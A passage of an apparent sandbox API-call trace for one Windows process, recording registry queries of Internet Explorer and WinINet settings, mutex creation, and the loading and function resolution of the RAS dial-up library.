FAILURE | 0x00000006 | 1 time |
| 07:43:40,186 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,186 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,186 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274 |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926 |
FAILURE | 0x00000002 | |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,196 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,196 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,206 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,206 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,206 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,206 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,206 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,206 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_USE_CNAME_FOR_SPN_KB911149 |
FAILURE | 0x00000002 | |
| 07:43:40,206 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342 |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,216 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,216 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,216 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801 |
FAILURE | 0x00000002 | |
| 07:43:40,226 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,226 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,226 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,226 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,226 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,236 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,236 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,236 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,236 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,236 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => HttpDefaultExpiryTimeSecs Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => FtpDefaultExpiryTimeSecs Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => GopherDefaultExpiryTimeSecs Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableCachingOfSSLPages Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,236 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => PerUserCookies Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => LeashLegacyCookies Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableNT4RasCheck Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => DialupUseLanSettings Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => DialupUseLanSettings Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => SendExtraCRLF Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => BypassFtpTimeCheck Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableGopher Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => ReleaseSocketDuringAuth Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => ReleaseSocketDuring401Auth Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => ReleaseSocketDuring401Auth Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WpadSearchAllDomains Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => DisableLegacyPreAuthAsServer Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => DisableLegacyPreAuthAsServer Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => BypassHTTPNoCacheCheck Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => BypassHTTPNoCacheCheck Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => BypassSSLNoCacheCheck Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => BypassSSLNoCacheCheck Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => EnableHttpTrace Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => EnableHttpTrace Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => NoCheckAutodialOverRide Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => NoCheckAutodialOverRide Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => DontUseDNSLoadBalancing Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DontUseDNSLoadBalancing Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => NonBlockingClient32 Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => ShareCredsWithWinHttp Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 66 ValueName => MimeExclusionListForCache Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 Data => multipart/mixed multipart/x-mixed-replace multipart/x-byteranges \x00 ValueName => MimeExclusionListForCache |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 0 ValueName => HeaderExclusionListForCache Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DnsCacheEnabled Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DnsCacheEntries Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DnsCacheTimeout Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 Data => ValueName => WarnOnPost |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WarnAlwaysOnPost Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 Data => 0 ValueName => WarnOnZoneCrossing |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WarnOnBadCertSending Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WarnOnBadCertRecving Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WarnOnPostRedirect Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => AlwaysDrainOnRedirect Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => WarnOnHTTPSToHTTPRedirect Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | NtOpenMutant |
Handle => 0x000000e8 MutexName => WininetStartupMutex |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => GlobalUserOffline Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | NtOpenMutant |
Handle => 0x771b9318 MutexName => WininetConnectionMutex |
FAILURE | 3221225524 | |
| 07:43:40,246 | 1308 | NtCreateMutant |
Handle => 0x000000f4 InitialOwner => 0 MutexName => WininetConnectionMutex |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | NtCreateMutant |
Handle => 0x000000f8 InitialOwner => 0 MutexName => |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | NtOpenMutant |
Handle => 0x000000fc MutexName => WininetProxyRegistryMutex |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => rnaapp.exe |
FAILURE | 3221225781 | 1 time |
| 07:43:40,246 | 1308 | RegOpenKeyExA |
Handle => 0x00000100 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x00000100 DataLength => 11 ValueName => UrlEncoding Type => 1 |
FAILURE | 0x000000ea | |
| 07:43:40,246 | 1308 | RegCloseKey |
Handle => 0x00000100 |
SUCCESS | 0x00000000 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => TruncateFileName Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,246 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => BadProxyExpiresTime Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,266 | 1308 | LdrLoadDll |
Flags => 12712840 BaseAddress => 0x76ee0000 FileName => RASAPI32.DLL |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasDialW FunctionAddress => 0x76ef68db ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasHangUpW FunctionAddress => 0x76ee8bcd ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasEnumEntriesW FunctionAddress => 0x76ee3ce9 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetEntryDialParamsW FunctionAddress => 0x76ee7ad0 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasSetEntryDialParamsW FunctionAddress => 0x76ee917c ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasEditPhonebookEntryW FunctionAddress => 0x76ee6839 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasCreatePhonebookEntryW FunctionAddress => 0x76ee6767 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetErrorStringW FunctionAddress => 0x76ee7d38 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetConnectStatusW FunctionAddress => 0x76ee70cb ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasEnumConnectionsW FunctionAddress => 0x76ee2520 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetEntryPropertiesW FunctionAddress => 0x76ee9a5b ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetCredentialsW FunctionAddress => 0x76eeacb1 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasSetCredentialsW FunctionAddress => 0x76eeb078 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasGetAutodialAddressA FunctionAddress => 0x76eebbe0 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
